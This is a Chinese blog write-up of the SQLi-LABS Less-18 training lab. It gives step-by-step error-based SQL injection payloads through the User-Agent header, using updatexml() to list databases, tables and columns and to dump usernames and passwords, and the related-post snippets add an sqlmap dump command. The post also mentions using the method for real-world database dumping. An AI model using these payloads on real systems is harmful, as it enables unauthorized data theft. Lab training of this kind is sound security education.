SQLi LABS Less-18 报错注入

已于 2024-12-29 09:32:49 修改
阅读量1.6w 收藏 7
点赞数 4
分类专栏: 《靶场实战》 文章标签: 安全 web安全 网络安全
于 2021-06-22 20:39:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wangyuxiang946/article/details/118115291
版权
本文介绍了一位网络安全专家如何利用GET请求的User-Agent字段进行错误注入,详细步骤包括注入方式判断、获取数据库名、表名、字段名,以及获取用户表数据。展示了在实际环境中利用Burp工具进行的攻击和防御策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 「作者简介」:冬奥会网络安全中国代表队,优快云 Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

第十八关请求方式为 GET请求 , 注入点为 User-Agent , 注入方式为 报错注入

第一步,判断注入方式

 先看源码

 后台代码对 特殊字符进行了过滤 , 常规的注入方式行不通 , 只有通过代码审计来判断注入方式

 

 登录成功后 , 有一个保存用户主机信息的SQL语句 , 并且没有对参数进行过滤 , 我们可以针对这个SQL进行错误注入

真实场景中 , 我们可以先注册一个账号进行登录 , 登录成功后通过User-Agent 进行错误注入 , 从而实现脱库

使用 Burp 工具进行代理拦截 , 修改 User-Agent

User-Agent: ' and updatexml(1,'~',3) and '

updatexml() 的第2个参数如果包含特殊符号就会报错 , 利用其报错信息可获取数据库信息

 

页面返回了我们插入的报错信息 , 固 存在错误注入

第二步,获取所有数据库

 查询information_schema默认数据库的schemata表的schema_name字段 , 该字段保存了所有数据库名

User-Agent: ' and updatexml(1,concat('~',
substr(
(select group_concat(schema_name) 
from information_schema.schemata),50,31)
),3) and '

 concat() , 可将结果拼接指定字符 , 目的在于触发错误

group_concat() , 可将多行结果合并为一行 , 目的在于方便展示

sunstr() , 用来截取字符串 , updatexml()返回结果的字符串长度限制为32 , 需要多次截取来获取完整结果

注意: User-Agent 的参数中 不要包含空格

下一步 , 根据security数据库 获取其所有表

第三步,获取所有表

查询information_schema默认数据库的tables表的table_name字段 , 该字段保存了所有表名

User-Agent: ' and updatexml(1,concat('~',
substr(
(select group_concat(table_name) 
from information_schema.tables 
where table_schema='security')
,1,31)
),3) and '

注意 : User-Agent 参数中 不要有空格

users表为用户表 , 下一步根据users表 获取其所有字段

第四步,获取所有字段

查询information_schema默认数据库的columns表的column_name字段 , 该字段保存了所有字段名

User-Agent: ' and updatexml(1,concat('~',
substr(
(select group_concat(column_name) 
from information_schema.columns 
where table_schema='security' and table_name='users')
,1,31))
,3) and '

注意 : User-Agent 参数中不要有空格

第五步,获取账号密码

User-Agent: ' and updatexml(1,concat('~',
substr(
(select group_concat(username,'~',password)
from security.users)
,1,31))
,3) and '

sqli-lab-less18
Sa1nZen的博客
08-05 218
sqli-lab-less18
sqli-labs Less-5 (报错注入
A9874564的博客
02-25 4375
在实际场景中,如果没有一个合适的数据返回点,而是仅仅带入Sql数据进行查询,就需要报错注入。 1.less 5 正常情况,我们构造闭合,发现没有问题 利用前几关的思路,发现无论怎么操作都是You are in......,这个时候一般的思路就行不通。 发现:仅带入Sql数据进行查询,没有一个合适的数据返回点,这时候可以尝试报错注入。 2.报错注入 2.1 extractvalue报错 示例: and extractvalue(null,concat(0x7e,(sql_inje.
sqli-labs通关攻略(Less-18~Less-20)
2301_78554096的博客
02-28 1107
sqli-labs通关攻略(Less-18~Less-20)
sql-lab靶场 less 18-21 】特殊点注入
最新发布
CrazyDog_JJ的博客
05-02 662
这里在登陆之后后台会讲username放入cookie中,再次登陆界面的时候,只要是cookie信息没有过期,就回去cookie里面取值,然后进行查询。打开我们可以看到这个界面,这里直接显示了我们的ip地址,然后我们输入正确的用户和密码,查看回显,出现referer信息;打开我们可以看到这个界面,这里直接显示了我们的ip地址,然后我们输入正确的用户和密码,查看回显,出现一个user-agent。这里显示出cookie信息,并且可以删除cookie信息,我们认为可能在cookie的地方存在注入,分析代码。
sqli-labs less18
qq_45106794的博客
10-24 454
sqli-labs less 18 reader-l ‘or updatexml(1,concat(’#’,(select user()),1),1) 先用这句话简单的判断后台insert 语句 insert="INSERTINTOsecurity.uagents(uagent,ipaddress,username)VALUES(′insert="INSERT INTO security.uage...
sqli-labs(less-18)
m0_64849639的博客
08-02 985
less-18关于uagent注入
sqli-labs (less-18)
kukudeshuo的博客
03-11 1229
sqli-labs (less-18) 进入18关,输入用户名和密码以后,我们发现屏幕上回显了我们的IP地址和我们的User Agent 用hackbar抓取POST包,在用户名和密码的位置判断注入点,这里我试了很久,发现用户名和密码的位置都是没有注入点的,那是不是代表这关不存在SQL注入漏洞呢,我们注意到一个特点,页面回显了我们的User Agent,所以我们猜想可能注入点在User Agent这里 想抓取到User Agent,可以利用火狐插件或者使用burpsuite抓包,这里演示利用burpsui
sqli-labsLess18~Less22
weixin_33976072的博客
08-16 195
Less18: User-Agent注入,有错误回显 感叹一句,越来越难了。现在只能先看代码再分析怎么注入了..... 通过代码,发现username和password均做了校验。但是会有一个插入user-agent的sql语句。故要通过user-agent注入。 用户名密码就假设已知为admin/admin了。 还是用updatexml函数,用Burp Suite更改user-agent字段为:...
SQLi LABS Less-12 联合注入+报错注入_完成sqli-labs靶场的less-12,描述注入过程并截图上传。
2401_84264536的博客
06-20 189
【代码】SQLi LABS Less-12 联合注入+报错注入_完成sqli-labs靶场的less-12,描述注入过程并截图上传。
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1731
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-LabsSQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
Sqli-labs Less17 报错注入
beiweixiaotian66的博客
07-25 396
一丢丢Sqli-labs小练习
sqli-labs Less-18
qq_42630215的博客
05-04 904
LESS-18 POST - Header Injection -Uagent field - Error based 0x01. 随便测试几个查看有无回显 错误回显和正确回显都是显示IP地址 错误回显: 正确回显: 在正确的回显中可以看见user agent,猜测可以利用进行注入,可以查看源码进行分析。 用户名与密码的获取方式是post,而且采用了check_input处理,所以在这两个地...
sqli-labs/Less-18
m0_71299382的博客
11-18 211
sqli-labs/第十八关
sqli-labs-less-18、19、20、21、22
giun的博客
02-13 1449
先学习下http头部常见的一些关键字 Accept: 浏览器能够处理的内容类型 Accept-Charset: 浏览器能够显示的字符集 Accept-Encoding:浏览器能够处理的压缩编码。 Accept-Language: 浏览器当前设置的语言。 Connection:浏览器与服务器之间连接的类型 Cookie:当前页面设置的任何Cookie Host:发出请求的页面所在的域。 Refere...
sqli-labs ————less -18
Fly_鹏程万里
05-12 3899
Less-18源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
Sqli-labsLess-18Less-19
→_→
04-12 4040
Less-18 基于错误的用户代理,头部POST注入 (注:这一个模拟的场景是注册登录后的注入) 由题意可知,这又是一种新姿势,老方法,查找注入点,发现前面的方法都未成功。且错误回显与正确回显都显示IP: 这里写说几个常用请求头:(上一篇文章详细讲过) Host ...
网络安全sqli-labs Less-18 解题详析
等风来
07-29 3989
这个语句是从 security.users 表中的 username 列中获取用户名,获取到的并不是全部的用户名,而是从第一个字符开始的长度为 32 的子字符串。这里先介绍一下mid()函数,mid()函数是一种字符串函数,用于提取给定字符串的子字符串。该题为基于GET及报错的User-Agent注入,故需在参数后构造POC。函数将从第 7 个字符开始提取长度为 5 的子字符串,结果为。,如果想要提取其中的子字符串。例如,假设有一个字符串。由回显可知,注入类型为。该题采用抓包进行处理。
sqli-labs less-8 布尔注入hack
01-04
### 关于sqli-labs Less-8 布尔盲注攻击方法 布尔盲注是一种通过观察应用响应来推断数据库内容的方法。当直接返回查询结果不可行时,这种技术尤为有用。 对于Sqli-labs中的Less-8实验场景,其特点在于仅显示一条记录,并且不会因为错误的SQL语句而改变页面布局或报错提示。因此,利用布尔条件判断可以逐步获取隐藏的信息[^1]。 #### 攻击流程分析 为了验证是否存在布尔注入漏洞,可以通过修改URL参数`id`后的值来进行测试: ```plaintext http://192.168.1.218/sqli-labs-master/Less-8/?id=1' AND 1=1 -- ``` 如果上述链接能够正常加载并显示出数据,则说明存在潜在的安全隐患;反之则表示该处可能进行了防护措施。接着尝试不同的逻辑表达式组合,比如: ```plaintext http://192.168.1.218/sqli-labs-master/Less-8/?id=1' AND 1=0 -- ``` 此时应该看不到任何输出或者得到空白页,这表明服务器端确实执行了我们的输入作为SQL的一部分[^2]。 #### 自动化工具辅助检测 考虑到手动逐位猜测效率低下,在实际操作过程中通常会借助自动化脚本完成整个过程。例如使用sqlmap这款开源渗透测试软件,它支持多种类型的SQL注入方式,包括但不限于时间延迟、联合查询以及当前讨论的布尔型注入等。 命令如下所示: ```bash sqlmap -u "192.168.1.218/sqli-labs-master/Less-8/?id=1" --technique B --dbms=mysql -D security -T users -C username,password --dump ``` 此指令指定了目标网址、采用的技术手段(B代表布尔)、指定的目标数据库管理系统类型为MySQL,并进一步明确了要访问的具体表名和字段名称,最后加上`--dump`选项用于导出所选列的数据。 #### 手工构建payload实例 除了依赖现成工具外,掌握手工编写有效载荷的能力同样重要。下面给出几个简单的例子供学习参考: - 判断版本号长度是否大于等于某个数值: ```sql id=1' AND LENGTH(@@version)>=5 # ``` - 获取特定位置上的字符: ```sql id=1' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1),1,1))>97# ``` 这些技巧可以帮助理解如何绕过某些防御机制实现信息泄露的目的。不过需要注意的是,所有活动都应在授权范围内进行,非法入侵他人信息系统属于违法行为。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值